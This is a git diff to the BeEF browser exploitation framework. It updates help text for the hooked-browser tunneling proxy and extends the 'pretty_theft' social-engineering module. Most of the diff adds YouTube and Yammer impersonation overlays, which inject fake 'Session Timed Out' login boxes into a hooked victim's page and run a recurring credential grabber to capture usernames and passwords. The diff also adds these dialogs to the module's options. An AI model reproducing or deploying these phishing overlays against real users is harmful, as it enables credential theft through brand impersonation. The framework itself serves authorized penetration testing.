diff --git a/extensions/admin_ui/media/images/help/forge.png b/extensions/admin_ui/media/images/help/forge.png new file mode 100644 index 000000000..b24095662 Binary files /dev/null and b/extensions/admin_ui/media/images/help/forge.png differ diff --git a/extensions/admin_ui/media/images/help/history.png b/extensions/admin_ui/media/images/help/history.png new file mode 100644 index 000000000..c92c4a72b Binary files /dev/null and b/extensions/admin_ui/media/images/help/history.png differ diff --git a/extensions/admin_ui/media/images/help/proxy.png b/extensions/admin_ui/media/images/help/proxy.png new file mode 100644 index 000000000..c924c5679 Binary files /dev/null and b/extensions/admin_ui/media/images/help/proxy.png differ diff --git a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabRider.js b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabRider.js index cadd37d15..4973ae7e6 100644 --- a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabRider.js +++ b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabRider.js @@ -32,7 +32,7 @@ ZombieTab_Requester = function(zombie) { title: 'Proxy', layout: 'fit', padding: '10 10 10 10', - html: "

The Tunneling Proxy allows you to use a hooked browser as a proxy. Simply right-click a browser from the Hooked Browsers tree to the left and select \"Use as Proxy\". Each request sent through the Proxy is recorded in the History panel in the Rider tab. Click a history item to view the HTTP headers and HTML source of the HTTP response.

", + html: "

The Tunneling Proxy allows you to use a hooked browser as a proxy. Simply right-click a browser from the Hooked Browsers tree to the left and select \"Use as Proxy\".

The proxy runs on localhost port 6789 by default. Each request sent through the Proxy is recorded in the History panel in the Rider tab. Click a history item to view the HTTP headers and HTML source of the HTTP response.

To manually forge an arbitrary HTTP request use the \"Forge Request\" tab from the Rider tab.

For more information see: https://github.com/beefproject/beef/wiki/Tunneling

", listeners: { activate: function(proxy_panel) { // to do: refresh list of hooked browsers diff --git a/modules/social_engineering/pretty_theft/command.js b/modules/social_engineering/pretty_theft/command.js index fea87a230..76a584672 100644 --- a/modules/social_engineering/pretty_theft/command.js +++ b/modules/social_engineering/pretty_theft/command.js @@ -163,6 +163,65 @@ beef.execute(function() { credgrabber = setInterval(checker,1000); } + // YouTube floating div + function youtube() { + + sneakydiv = document.createElement('div'); + sneakydiv.setAttribute('id', 'popup'); + sneakydiv.setAttribute('style', 'position:absolute; top:30%; left:40%; z-index:51; background-color:ffffff;'); + document.body.appendChild(sneakydiv); + + // Set appearance using styles, maybe cleaner way to do this with CSS block? + var windowborder = 'style="width:330px;background:white;border: 10px #999999 solid;border-radius:8px;"'; + var windowmain = 'style="border:1px #555 solid;"'; + var tbarstyle = 'style="color:white; font-size: 14px;font-family:Arial,sans-serif;font-weight: bold;outline-style: inherit;outline-color: #000000;outline-width: 1px;padding:5px;padding-left:8px;padding-right:6px;text-align: left;height: 22px;line-height:22px;border-bottom: 1px solid #CDCDCD;background: #F4F4F4;filter: progid:DXImageTransform.Microsoft.gradient(startColorstr=#919191, endColorstr=#595959);background: -webkit-gradient(linear, left top, left bottom, from(#919191), to(#595959));background: -moz-linear-gradient(top, #919191, #595959);"'; + var bbarstyle = 'style="color: rgb(0, 0, 0);background-color: rgb(242, 242, 242);padding: 8px;text-align: right;border-top: 1px solid rgb(198, 198, 198);height:28px;margin-top:10px;"'; + var messagestyle = 'style="align:left;font-size:11px;font-family:Arial,sans-serif;margin:10px 15px;line-height:12px;height:40px;"'; + var box_prestyle = 'style="color: #666;font-size: 11px;font-weight: bold;font-family: Arial,sans-serif;padding-left:30px;"'; + var inputboxstyle = 'style="width:140px;font-size: 11px;height: 20px;line-height:20px;padding-left:4px;border-style: solid;border-width: 1px;border-color:#CDCDCD;"'; + var buttonstyle = 'style="font-size: 13px;background:#069;color:#fff;font-weight:bold;border: 1px #29447e solid;padding: 3px 3px 3px 3px;clear:both;margin-right:5px;"'; + var logo = 'http://www.youtube.com/yt/brand/media/image/yt-brand-standard-logo-630px.png'; + var title = 'Session Timed Out YouTube'; + var messagewords = 'Your session has timed out due to inactivity.

Please re-enter your username and password to login.'; + var buttonLabel = ''; + + // Build page including styles + sneakydiv.innerHTML= '
' +title+ '

' + messagewords + '

Username:
Password:
' + '
' +buttonLabel+ '
'; + + // Repeatedly check if button has been pressed + credgrabber = setInterval(checker,1000); + + } + + // Yammer floating div + function yammer() { + + sneakydiv = document.createElement('div'); + sneakydiv.setAttribute('id', 'popup'); + sneakydiv.setAttribute('style', 'position:absolute; top:30%; left:40%; z-index:51; background-color:ffffff;'); + document.body.appendChild(sneakydiv); + + // Set appearance using styles, maybe cleaner way to do this with CSS block? + var windowborder = 'style="width:330px;background:white;border: 10px #999999 solid;border-radius:8px;"'; + var windowmain = 'style="border:1px #555 solid;"'; + var tbarstyle = 'style="color:white; font-size: 14px;font-family:Arial,sans-serif;font-weight: bold;outline-style: inherit;outline-color: #000000;outline-width: 1px;padding:5px;padding-left:8px;padding-right:6px;text-align: left;height: 22px;line-height:22px;border-bottom: 1px solid #CDCDCD;background: #F4F4F4;filter: progid:DXImageTransform.Microsoft.gradient(startColorstr=#919191, endColorstr=#595959);background: -webkit-gradient(linear, left top, left bottom, from(#919191), to(#595959));background: -moz-linear-gradient(top, #919191, #595959);"'; + var bbarstyle = 'style="color: rgb(0, 0, 0);background-color: rgb(242, 242, 242);padding: 8px;text-align: right;border-top: 1px solid rgb(198, 198, 198);height:28px;margin-top:10px;"'; + var messagestyle = 'style="align:left;font-size:11px;font-family:Arial,sans-serif;margin:10px 15px;line-height:12px;height:40px;"'; + var box_prestyle = 'style="color: #666;font-size: 11px;font-weight: bold;font-family: Arial,sans-serif;padding-left:30px;"'; + var inputboxstyle = 'style="width:140px;font-size: 11px;height: 20px;line-height:20px;padding-left:4px;border-style: solid;border-width: 1px;border-color:#CDCDCD;"'; + var buttonstyle = 'style="font-size: 13px;background:#069;color:#fff;font-weight:bold;border: 1px #29447e solid;padding: 3px 3px 3px 3px;clear:both;margin-right:5px;"'; + var logo = 'https://www.yammer.com/favicon.ico'; + var title = 'Session Timed Out Yammer'; + var messagewords = 'Your Yammer session has timed out due to inactivity.

Please re-enter your username and password to login.'; + var buttonLabel = ''; + + // Build page including styles + sneakydiv.innerHTML= '
' +title+ '

' + messagewords + '

Username:
Password:
' + '
' +buttonLabel+ '
'; + + // Repeatedly check if button has been pressed + credgrabber = setInterval(checker,1000); + + } // Generic floating div with image function generic() { @@ -181,19 +240,24 @@ beef.execute(function() { // Set background opacity and apply background var backcolor = "<%== @backing %>"; if(backcolor == "Grey"){ - grayOut(true,{'opacity':'70'}); - }else if(backcolor == "Clear"){ - grayOut(true,{'opacity':'0'}); + grayOut(true,{'opacity':'70'}); + } else if(backcolor == "Clear"){ + grayOut(true,{'opacity':'0'}); } - // Retrieve the chosen div option from Beef and display + // Retrieve the chosen div option from BeEF and display var choice = "<%= @choice %>"; - if(choice == "Facebook"){ - facebook(); - } else if(choice == "LinkedIn"){ - linkedin(); - } else{ - generic(); + switch (choice) { + case "Facebook": + facebook(); break; + case "LinkedIn": + linkedin(); break; + case "YouTube": + youtube(); break; + case "Yammer": + yammer(); break; + default: + generic(); break; } }); diff --git a/modules/social_engineering/pretty_theft/module.rb b/modules/social_engineering/pretty_theft/module.rb index bb58c0a8f..07e1aea9b 100644 --- a/modules/social_engineering/pretty_theft/module.rb +++ b/modules/social_engineering/pretty_theft/module.rb @@ -9,7 +9,7 @@ class Pretty_theft < BeEF::Core::Command configuration = BeEF::Core::Configuration.instance logo_uri = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/ui/media/images/beef.png" return [ - {'name' => 'choice', 'type' => 'combobox', 'ui_label' => 'Dialog Type', 'store_type' => 'arraystore', 'store_fields' => ['choice'], 'store_data' => [['Facebook'],['LinkedIn'],['Generic']], 'valueField' => 'choice', 'value' => 'Facebook', editable: false, 'displayField' => 'choice', 'mode' => 'local', 'autoWidth' => true }, + {'name' => 'choice', 'type' => 'combobox', 'ui_label' => 'Dialog Type', 'store_type' => 'arraystore', 'store_fields' => ['choice'], 'store_data' => [['Facebook'],['LinkedIn'],['YouTube'],['Yammer'],['Generic']], 'valueField' => 'choice', 'value' => 'Facebook', editable: false, 'displayField' => 'choice', 'mode' => 'local', 'autoWidth' => true }, {'name' => 'backing', 'type' => 'combobox', 'ui_label' => 'Backing', 'store_type' => 'arraystore', 'store_fields' => ['backing'], 'store_data' => [['Grey'],['Clear']], 'valueField' => 'backing', 'value' => 'Grey', editable: false, 'displayField' => 'backing', 'mode' => 'local', 'autoWidth' => true },